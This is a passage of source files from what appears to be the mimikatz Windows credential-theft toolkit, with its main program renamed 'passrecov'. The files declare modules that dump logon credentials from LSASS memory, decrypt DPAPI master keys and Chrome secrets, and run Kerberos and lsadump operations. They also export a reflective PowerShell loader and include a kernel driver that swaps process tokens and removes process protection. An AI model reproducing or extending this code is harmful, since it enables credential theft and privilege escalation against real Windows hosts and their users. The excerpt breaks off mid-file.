PKULL_M_MINIDUMP_HANDLE hMinidump); 17 | BOOL kull_m_minidump_copy(IN PKULL_M_MINIDUMP_HANDLE hMinidump, OUT VOID *Destination, IN VOID *Source, IN SIZE_T Length); 18 | 19 | LPVOID kull_m_minidump_RVAtoPTR(IN PKULL_M_MINIDUMP_HANDLE hMinidump, RVA64 rva); 20 | LPVOID kull_m_minidump_stream(IN PKULL_M_MINIDUMP_HANDLE hMinidump, MINIDUMP_STREAM_TYPE type, OUT OPTIONAL DWORD *pSize); 21 | LPVOID kull_m_minidump_remapVirtualMemory64(IN PKULL_M_MINIDUMP_HANDLE hMinidump, IN VOID *Source, IN SIZE_T Length); -------------------------------------------------------------------------------- /modules/kull_m_crypto_remote.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_remotelib.h" 9 | 10 | //typedef BOOL (WINAPI * PCRYPTPROTECTMEMORY) (__inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags); 11 | typedef BOOL (WINAPI * PCRYPTUNPROTECTMEMORY) (__inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags); 12 | 13 | BOOL WINAPI kull_m_crypto_remote_CryptProtectMemory_Generic(__in PKULL_M_MEMORY_HANDLE hProcess, __in BOOL bIsProtect, __inout LPVOID pDataIn, __in DWORD cbDataIn, __in DWORD dwFlags); 14 | 15 | #define kull_m_crypto_remote_CryptProtectMemory(hProcess, pDataIn, cbDataIn, dwFlags) kull_m_crypto_remote_CryptProtectMemory_Generic(hProcess, TRUE, pDataIn, cbDataIn, dwFlags) 16 | #define kull_m_crypto_remote_CryptUnprotectMemory(hProcess, pDataIn, cbDataIn, dwFlags) kull_m_crypto_remote_CryptProtectMemory_Generic(hProcess, FALSE, pDataIn, cbDataIn, dwFlags) -------------------------------------------------------------------------------- /inc/PshPack8.h: -------------------------------------------------------------------------------- 1 | /*++ 2 | 3 | Copyright (c) Microsoft Corporation. All rights reserved. 4 | 5 | Module Name: 6 | 7 | pshpack8.h 8 | 9 | Abstract: 10 | 11 | This file turns 8 byte packing of structures on. (That is, it disables 12 | automatic alignment of structure fields.) An include file is needed 13 | because various compilers do this in different ways. For Microsoft 14 | compatible compilers, this files uses the push option to the pack pragma 15 | so that the poppack.h include file can restore the previous packing 16 | reliably. 17 | 18 | The file poppack.h is the complement to this file. 19 | 20 | --*/ 21 | 22 | #if ! (defined(lint) || defined(RC_INVOKED)) 23 | #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED) 24 | #pragma warning(disable:4103) 25 | #if !(defined( MIDL_PASS )) || defined( __midl ) 26 | #pragma pack(push,8) 27 | #else 28 | #pragma pack(8) 29 | #endif 30 | #else 31 | #pragma pack(8) 32 | #endif 33 | #endif /* ! (defined(lint) || defined(RC_INVOKED)) */ 34 | 35 | -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_mimicom.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | 4 | typedef void *MIMI_HANDLE; 5 | 6 | NTSTATUS SRV_MimiBind(handle_t rpc_handle, PMIMI_PUBLICKEY clientPublicKey, PMIMI_PUBLICKEY serverPublicKey, MIMI_HANDLE *phMimi); 7 | NTSTATUS SRV_MiniUnbind(MIMI_HANDLE *phMimi); 8 | NTSTATUS SRV_MimiCommand(MIMI_HANDLE phMimi, DWORD szEncCommand, BYTE *encCommand, DWORD *szEncResult, BYTE **encResult); 9 | NTSTATUS SRV_MimiClear(handle_t rpc_handle, wchar_t *command, DWORD *size, wchar_t **result); 10 | 11 | NTSTATUS CLI_MimiBind(handle_t rpc_handle, PMIMI_PUBLICKEY clientPublicKey, PMIMI_PUBLICKEY serverPublicKey, MIMI_HANDLE *phMimi); 12 | NTSTATUS CLI_MiniUnbind(MIMI_HANDLE *phMimi); 13 | NTSTATUS CLI_MimiCommand(MIMI_HANDLE phMimi, DWORD szEncCommand, BYTE *encCommand, DWORD *szEncResult, BYTE **encResult); 14 | NTSTATUS CLI_MimiClear(handle_t rpc_handle, wchar_t *command, DWORD *size, wchar_t **result); 15 | 16 | void __RPC_USER SRV_MIMI_HANDLE_rundown(MIMI_HANDLE phMimi); 17 | extern RPC_IF_HANDLE MimiCom_v1_0_c_ifspec, MimiCom_v1_0_s_ifspec; -------------------------------------------------------------------------------- /modules/kull_m_service.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | 10 | BOOL kull_m_service_getUniqueForName(PCWSTR serviceName, SERVICE_STATUS_PROCESS * pServiceStatusProcess); 11 | 12 | BOOL kull_m_service_start(PCWSTR serviceName); 13 | BOOL kull_m_service_remove(PCWSTR serviceName); 14 | BOOL kull_m_service_stop(PCWSTR serviceName); 15 | BOOL kull_m_service_suspend(PCWSTR serviceName); 16 | BOOL kull_m_service_resume(PCWSTR serviceName); 17 | BOOL kull_m_service_preshutdown(PCWSTR serviceName); 18 | BOOL kull_m_service_shutdown(PCWSTR serviceName); 19 | 20 | BOOL kull_m_service_genericControl(PCWSTR serviceName, DWORD dwDesiredAccess, DWORD dwControl, LPSERVICE_STATUS ptrServiceStatus); 21 | BOOL kull_m_service_addWorldToSD(SC_HANDLE monHandle); 22 | BOOL kull_m_service_install(PCWSTR serviceName, PCWSTR displayName, PCWSTR binPath, DWORD serviceType, DWORD startType, BOOL startIt); 23 | BOOL kull_m_service_uninstall(PCWSTR serviceName); -------------------------------------------------------------------------------- /plog/modules/dpapi/kuhl_m_dpapi.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "../kuhl_m.h" 9 | #include "../modules/kull_m_file.h" 10 | #include "../modules/kull_m_dpapi.h" 11 | 12 | #include "kuhl_m_dpapi_oe.h" 13 | #include "packages/kuhl_m_dpapi_chrome.h" 14 | 15 | const KUHL_M kuhl_m_dpapi; 16 | 17 | NTSTATUS kuhl_m_dpapi_blob(int argc, wchar_t * argv[]); 18 | NTSTATUS kuhl_m_dpapi_protect(int argc, wchar_t * argv[]); 19 | NTSTATUS kuhl_m_dpapi_masterkey(int argc, wchar_t * argv[]); 20 | NTSTATUS kuhl_m_dpapi_credhist(int argc, wchar_t * argv[]); 21 | 22 | BOOL kuhl_m_dpapi_unprotect_raw_or_blob(LPCVOID pDataIn, DWORD dwDataInLen, LPWSTR *ppszDataDescr, int argc, wchar_t * argv[], LPCVOID pOptionalEntropy, DWORD dwOptionalEntropyLen, LPVOID *pDataOut, DWORD *dwDataOutLen, LPCWSTR pText); 23 | void kuhl_m_dpapi_display_MasterkeyInfosAndFree(LPCGUID guid, PVOID data, DWORD dataLen, PSID sid); 24 | void kuhl_m_dpapi_display_CredHist(PKULL_M_DPAPI_CREDHIST_ENTRY entry, LPCVOID ntlm, LPCVOID sha1); -------------------------------------------------------------------------------- /modules/kull_m_acr.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_string.h" 9 | 10 | #define IOCTL_CCID_ESCAPE SCARD_CTL_CODE(3500) 11 | 12 | #define ACR_MAX_LEN 255 13 | 14 | typedef struct _KULL_M_ACR_COMM { 15 | //SCARDCONTEXT hContext; 16 | SCARDHANDLE hCard; 17 | BOOL withoutCard; 18 | LPVOID suppdata; 19 | BOOL descr; 20 | } KULL_M_ACR_COMM, *PKULL_M_ACR_COMM; 21 | 22 | BOOL kull_m_acr_init(SCARDCONTEXT hContext, LPCWSTR szReaderName, BOOL withoutCard, LPVOID suppdata, BOOL descr, PKULL_M_ACR_COMM comm); 23 | void kull_m_acr_finish(PKULL_M_ACR_COMM comm); 24 | BOOL kull_m_arc_sendrecv(PKULL_M_ACR_COMM comm, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult); 25 | BOOL kull_m_acr_sendrecv_ins(PKULL_M_ACR_COMM comm, BYTE cla, BYTE ins, BYTE p1, BYTE p2, const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, BOOL noLe); 26 | BOOL CALLBACK kull_m_arcr_SendRecvDirect(const BYTE *pbData, const UINT16 cbData, BYTE *pbResult, UINT16 *cbResult, LPVOID suppdata); -------------------------------------------------------------------------------- /modules/kull_m_file.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include "kull_m_string.h" 10 | 11 | BOOL isBase71, isBase70; 12 | 13 | typedef BOOL (CALLBACK * PKULL_M_FILE_FIND_CALLBACK) (DWORD level, PCWCHAR fullpath, PCWCHAR path, PVOID pvArg); 14 | 15 | BOOL kull_m_file_getCurrentDirectory(wchar_t ** ppDirName); 16 | BOOL kull_m_file_getAbsolutePathOf(PCWCHAR thisData, wchar_t ** reponse); 17 | BOOL kull_m_file_isFileExist(PCWCHAR fileName); 18 | BOOL kull_m_file_writeData(PCWCHAR fileName, LPCVOID data, DWORD lenght); 19 | BOOL kull_m_file_readData(PCWCHAR fileName, PBYTE * data, PDWORD lenght); // for 'little' files ! 20 | BOOL kull_m_file_readGeneric(PCWCHAR fileName, PBYTE * data, PDWORD lenght, DWORD flags); 21 | void kull_m_file_cleanFilename(PWCHAR fileName); 22 | PWCHAR kull_m_file_fullPath(PCWCHAR fileName); 23 | BOOL kull_m_file_Find(PCWCHAR directory, PCWCHAR filter, BOOL isRecursive /*TODO*/, DWORD level, BOOL isPrintInfos, BOOL isWithDir, PKULL_M_FILE_FIND_CALLBACK callback, PVOID pvArg); -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-efsr.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "kull_m_rpc.h" 8 | 9 | extern const UUID EFSR_ObjectUUID; 10 | 11 | typedef void *PEXIMPORT_CONTEXT_HANDLE; 12 | 13 | typedef struct pipe_EFS_EXIM_PIPE { 14 | void (__RPC_USER* pull) (CHAR* state, UCHAR* buf, ULONG esize, ULONG* ecount); 15 | void (__RPC_USER* push) (CHAR* state, UCHAR* buf, ULONG ecount); 16 | void (__RPC_USER* alloc) (CHAR* state, ULONG bsize, UCHAR** buf, ULONG* bcount); 17 | char* state; 18 | } EFS_EXIM_PIPE; 19 | 20 | long EfsRpcOpenFileRaw(handle_t binding_h, PEXIMPORT_CONTEXT_HANDLE* hContext, wchar_t* FileName, long Flags); 21 | long EfsRpcReadFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsOutPipe); 22 | long EfsRpcWriteFileRaw(PEXIMPORT_CONTEXT_HANDLE hContext, EFS_EXIM_PIPE* EfsInPipe); 23 | void EfsRpcCloseRaw(PEXIMPORT_CONTEXT_HANDLE* hContext); 24 | long EfsRpcEncryptFileSrv(handle_t binding_h, wchar_t* FileName); 25 | long EfsRpcDecryptFileSrv(handle_t binding_h, wchar_t* FileName, unsigned long OpenFlag); 26 | 27 | RPC_IF_HANDLE efsrpc_v1_0_c_ifspec; -------------------------------------------------------------------------------- /plog/modules/dpapi/packages/kuhl_m_dpapi_chrome.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m_dpapi.h" 8 | #include "../modules/sqlite3.h" 9 | 10 | NTSTATUS kuhl_m_dpapi_chrome(int argc, wchar_t * argv[]); 11 | BOOL kuhl_m_dpapi_chrome_isTableExist(sqlite3 *pDb, const char *table); 12 | void kuhl_m_dpapi_chrome_decrypt(LPCVOID pData, DWORD dwData, BCRYPT_ALG_HANDLE hAlg, BCRYPT_KEY_HANDLE hKey, int argc, wchar_t * argv[], LPCWSTR type); 13 | void kuhl_m_dpapi_chrome_free_alg_key(BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey); 14 | BOOL kuhl_m_dpapi_chrome_alg_key_from_raw(BYTE key[AES_256_KEY_SIZE], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey); 15 | BOOL kuhl_m_dpapi_chrome_alg_key_from_b64(LPCWSTR base64, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey); 16 | BOOL kuhl_m_dpapi_chrome_alg_key_from_file(LPCWSTR szState, BOOL forced, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey); 17 | BOOL kuhl_m_dpapi_chrome_alg_key_from_auto(LPCWSTR szFile, int argc, wchar_t * argv[], BCRYPT_ALG_HANDLE *hAlg, BCRYPT_KEY_HANDLE *hKey); -------------------------------------------------------------------------------- /plog/modules/kuhl_m_standard.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "kuhl_m.h" 8 | #include "../../modules/kull_m_string.h" 9 | #include "../../modules/kull_m_file.h" 10 | #include "../../modules/kull_m_process.h" 11 | #include "../../modules/kull_m_net.h" 12 | #include "../../modules/kull_m_cabinet.h" 13 | 14 | const KUHL_M kuhl_m_standard; 15 | 16 | NTSTATUS kuhl_m_standard_cls(int argc, wchar_t * argv[]); 17 | NTSTATUS kuhl_m_standard_exit(int argc, wchar_t * argv[]); 18 | NTSTATUS kuhl_m_standard_cite(int argc, wchar_t * argv[]); 19 | NTSTATUS kuhl_m_standard_answer(int argc, wchar_t * argv[]); 20 | NTSTATUS kuhl_m_standard_coffee(int argc, wchar_t * argv[]); 21 | NTSTATUS kuhl_m_standard_sleep(int argc, wchar_t * argv[]); 22 | NTSTATUS kuhl_m_standard_log(int argc, wchar_t * argv[]); 23 | NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[]); 24 | NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]); 25 | NTSTATUS kuhl_m_standard_cd(int argc, wchar_t * argv[]); 26 | NTSTATUS kuhl_m_standard_localtime(int argc, wchar_t * argv[]); 27 | NTSTATUS kuhl_m_standard_hostname(int argc, wchar_t * argv[]); 28 | NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[]); -------------------------------------------------------------------------------- /mimidrv/kkll_m_modules.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | typedef NTSTATUS (* PKKLL_M_MODULE_CALLBACK) (SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue); 10 | 11 | typedef struct _KKLL_M_MODULE_FROM_ADDR { 12 | BOOLEAN isFound; 13 | ULONG_PTR addr; 14 | } KKLL_M_MODULE_FROM_ADDR, *PKKLL_M_MODULE_FROM_ADDR; 15 | 16 | typedef struct _KKLL_M_MODULE_BASIC_INFOS { 17 | PUCHAR addr; 18 | SIZE_T size; 19 | } KKLL_M_MODULE_BASIC_INFOS, *PKKLL_M_MODULE_BASIC_INFOS; 20 | 21 | NTSTATUS kkll_m_modules_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_MODULE_CALLBACK callback, PVOID pvArg); 22 | 23 | NTSTATUS kkll_m_modules_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue); 24 | 25 | NTSTATUS kkll_m_modules_fromAddr(PKIWI_BUFFER outBuffer, PVOID addr); 26 | NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue); 27 | 28 | NTSTATUS kkll_m_modules_first_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue); -------------------------------------------------------------------------------- /plog/passrecov.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | 8 | #include "globals.h" 9 | #include "modules/kuhl_m_standard.h" 10 | #include "modules/sekurlsa/kuhl_m_sekurlsa.h" 11 | #include "modules/kerberos/kuhl_m_kerberos.h" 12 | #include "modules/kuhl_m_privilege.h" 13 | #include "modules/kuhl_m_lsadump.h" 14 | #include "modules/dpapi/kuhl_m_dpapi.h" 15 | 16 | #include 17 | #include 18 | #define DELAYIMP_INSECURE_WRITABLE_HOOKS 19 | #include 20 | 21 | extern VOID WINAPI RtlGetNtVersionNumbers(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild); 22 | 23 | int wmain(int argc, wchar_t * argv[]); 24 | void passrecov_begin(); 25 | void passrecov_end(NTSTATUS status); 26 | 27 | BOOL WINAPI HandlerRoutine(DWORD dwCtrlType); 28 | 29 | NTSTATUS passrecov_initOrClean(BOOL Init); 30 | 31 | NTSTATUS passrecov_doLocal(wchar_t * input); 32 | NTSTATUS passrecov_dispatchCommand(wchar_t * input); 33 | 34 | #if defined(_POWERKATZ) 35 | __declspec(dllexport) wchar_t * powershell_reflective_passrecov(LPCWSTR input); 36 | #elif defined(_WINDLL) 37 | void CALLBACK passrecov_dll(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow); 38 | #if defined(_M_X64) || defined(_M_ARM64) 39 | #pragma comment(linker, "/export:mainW=passrecov_dll") 40 | #elif defined(_M_IX86) 41 | #pragma comment(linker, "/export:mainW=_passrecov_dll@16") 42 | #endif 43 | #endif -------------------------------------------------------------------------------- /plog/modules/sekurlsa/packages/kuhl_m_sekurlsa_tspkg.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "../kuhl_m_sekurlsa.h" 8 | 9 | KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package; 10 | 11 | NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[]); 12 | void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData); 13 | 14 | typedef struct _KIWI_TS_PRIMARY_CREDENTIAL { 15 | PVOID unk0; // lock ? 16 | KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; 17 | } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL; 18 | 19 | typedef struct _KIWI_TS_CREDENTIAL { 20 | #if defined(_M_X64) || defined(_M_ARM64) 21 | BYTE unk0[108]; 22 | #elif defined(_M_IX86) 23 | BYTE unk0[64]; 24 | #endif 25 | LUID LocallyUniqueIdentifier; 26 | PVOID unk1; 27 | PVOID unk2; 28 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; 29 | } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL; 30 | 31 | typedef struct _KIWI_TS_CREDENTIAL_1607 { 32 | #if defined(_M_X64) || defined(_M_ARM64) 33 | BYTE unk0[112]; 34 | #elif defined(_M_IX86) 35 | BYTE unk0[68]; 36 | #endif 37 | LUID LocallyUniqueIdentifier; 38 | PVOID unk1; 39 | PVOID unk2; 40 | PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary; 41 | } KIWI_TS_CREDENTIAL_1607, *PKIWI_TS_CREDENTIAL_1607; 42 | 43 | typedef struct _KIWI_TS_CREDENTIAL_HELPER { 44 | LONG offsetToLuid; 45 | LONG offsetToTsPrimary; 46 | } KIWI_TS_CREDENTIAL_HELPER, *PKIWI_TS_CREDENTIAL_HELPER; -------------------------------------------------------------------------------- /mimidrv/kkll_m_memory.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | typedef struct _KKLL_M_MEMORY_PATTERN { 10 | DWORD Length; 11 | PUCHAR Pattern; 12 | } KKLL_M_MEMORY_PATTERN, *PKKLL_M_MEMORY_PATTERN; 13 | 14 | typedef struct _KKLL_M_MEMORY_OFFSETS { 15 | LONG off0; 16 | LONG off1; 17 | LONG off2; 18 | LONG off3; 19 | LONG off4; 20 | LONG off5; 21 | LONG off6; 22 | LONG off7; 23 | LONG off8; 24 | LONG off9; 25 | } KKLL_M_MEMORY_OFFSETS, *PKKLL_M_MEMORY_OFFSETS; 26 | 27 | typedef struct _KKLL_M_MEMORY_GENERIC { 28 | KIWI_OS_INDEX OsIndex; 29 | KKLL_M_MEMORY_PATTERN Search; 30 | PWCHAR start; 31 | PWCHAR end; 32 | KKLL_M_MEMORY_OFFSETS Offsets; 33 | } KKLL_M_MEMORY_GENERIC, *PKKLL_M_MEMORY_GENERIC; 34 | 35 | NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur); 36 | NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo); 37 | 38 | PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics); 39 | NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size); 40 | NTSTATUS kkll_m_memory_vm_write(PVOID Dest, PVOID From, DWORD Size); 41 | NTSTATUS kkll_m_memory_vm_alloc(DWORD Size, PVOID *Addr); 42 | NTSTATUS kkll_m_memory_vm_free(PVOID Addr); -------------------------------------------------------------------------------- /mimidrv/kkll_m_process.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | 9 | typedef enum _KIWI_PROCESS_INDEX { 10 | EprocessNext = 0, 11 | EprocessFlags2 = 1, 12 | TokenPrivs = 2, 13 | SignatureProtect= 3, 14 | 15 | Eprocess_MAX = 4, 16 | } KIWI_PROCESS_INDEX, *PKIWI_PROCESS_INDEX; 17 | 18 | typedef struct _KIWI_NT6_PRIVILEGES { 19 | UCHAR Present[8]; 20 | UCHAR Enabled[8]; 21 | UCHAR EnabledByDefault[8]; 22 | } KIWI_NT6_PRIVILEGES, *PKIWI_NT6_PRIVILEGES; 23 | 24 | #define TOKEN_FROZEN_MASK 0x00008000 25 | #define PROTECTED_PROCESS_MASK 0x00000800 26 | 27 | typedef NTSTATUS (* PKKLL_M_PROCESS_CALLBACK) (SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg); 28 | NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_PROCESS_CALLBACK callback, PVOID pvArg); 29 | 30 | NTSTATUS kkll_m_process_token(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer); 31 | NTSTATUS kkll_m_process_protect(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer); 32 | NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer); 33 | 34 | NTSTATUS kkll_m_process_token_toProcess(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, HANDLE hSrcToken, PEPROCESS pToProcess); 35 | 36 | NTSTATUS kkll_m_process_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg); 37 | NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg); -------------------------------------------------------------------------------- /mimidrv/mimidrv.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | winddk 26 | 27 | 28 | winddk 29 | 30 | 31 | winddk 32 | 33 | 34 | winddk 35 | 36 | 37 | winddk 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | {72bed6ab-78d7-441d-9009-8445ec0e72e6} 46 | 47 | 48 | -------------------------------------------------------------------------------- /modules/kull_m_ldap.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_ldap.h" 7 | 8 | BOOL kull_m_ldap_getLdapAndRootDN(PCWCHAR system, PCWCHAR nc, PLDAP *ld, PWCHAR *rootDn, PSEC_WINNT_AUTH_IDENTITY pIdentity) 9 | { 10 | BOOL status = FALSE; 11 | DWORD dwErr; 12 | 13 | if(*ld = ldap_init((PWCHAR) system, LDAP_PORT)) 14 | { 15 | if(*rootDn = kull_m_ldap_getRootDomainNamingContext(nc, *ld)) 16 | { 17 | dwErr = ldap_bind_s(*ld, NULL, (PWCHAR) pIdentity, LDAP_AUTH_NEGOTIATE); 18 | status = (dwErr == LDAP_SUCCESS); 19 | if(!status) 20 | { 21 | PRINT_ERROR(L"ldap_bind_s 0x%x (%u)\n", dwErr, dwErr); 22 | *rootDn = (PWCHAR) LocalFree(*rootDn); 23 | } 24 | } 25 | if(!status) 26 | ldap_unbind(*ld); 27 | } 28 | else PRINT_ERROR(L"ldap_init\n"); 29 | return status; 30 | } 31 | 32 | PWCHAR kull_m_ldap_getRootDomainNamingContext(PCWCHAR nc, LDAP *ld) 33 | { 34 | DWORD dwErr; 35 | PWCHAR rootAttr[] = {nc ? (PWCHAR) nc : L"rootDomainNamingContext", NULL}, ret = NULL; 36 | PLDAPMessage pMessage = NULL; 37 | PBERVAL *pBerVal; 38 | 39 | dwErr = ldap_search_s(ld, NULL, LDAP_SCOPE_BASE, L"(dn=RootDSE)", rootAttr, FALSE, &pMessage); 40 | if(dwErr == LDAP_SUCCESS) 41 | { 42 | if(ldap_count_entries(ld, pMessage) == 1) 43 | { 44 | if(pBerVal = ldap_get_values_len(ld, pMessage, rootAttr[0])) 45 | { 46 | if(ldap_count_values_len(pBerVal) == 1) 47 | ret = kull_m_string_qad_ansi_c_to_unicode(pBerVal[0]->bv_val, pBerVal[0]->bv_len); 48 | else PRINT_ERROR(L"ldap_get_values_len is NOT 1\n"); 49 | ldap_value_free_len(pBerVal); 50 | } 51 | } 52 | else PRINT_ERROR(L"ldap_count_entries is NOT 1\n"); 53 | } 54 | else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", dwErr, dwErr); 55 | if(pMessage) 56 | ldap_msgfree(pMessage); 57 | return ret; 58 | } -------------------------------------------------------------------------------- /modules/kull_m_asn1.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include 9 | #include 10 | #include 11 | #include "kull_m_string.h" 12 | 13 | #define DIRTY_ASN1_ID_BOOLEAN 0x01 14 | #define DIRTY_ASN1_ID_INTEGER 0x02 15 | #define DIRTY_ASN1_ID_BIT_STRING 0x03 16 | #define DIRTY_ASN1_ID_OCTET_STRING 0x04 17 | #define DIRTY_ASN1_ID_NULL 0x05 18 | #define DIRTY_ASN1_ID_OBJECT_IDENTIFIER 0x06 19 | #define DIRTY_ASN1_ID_GENERAL_STRING 0x1b 20 | #define DIRTY_ASN1_ID_GENERALIZED_TIME 0x18 21 | #define 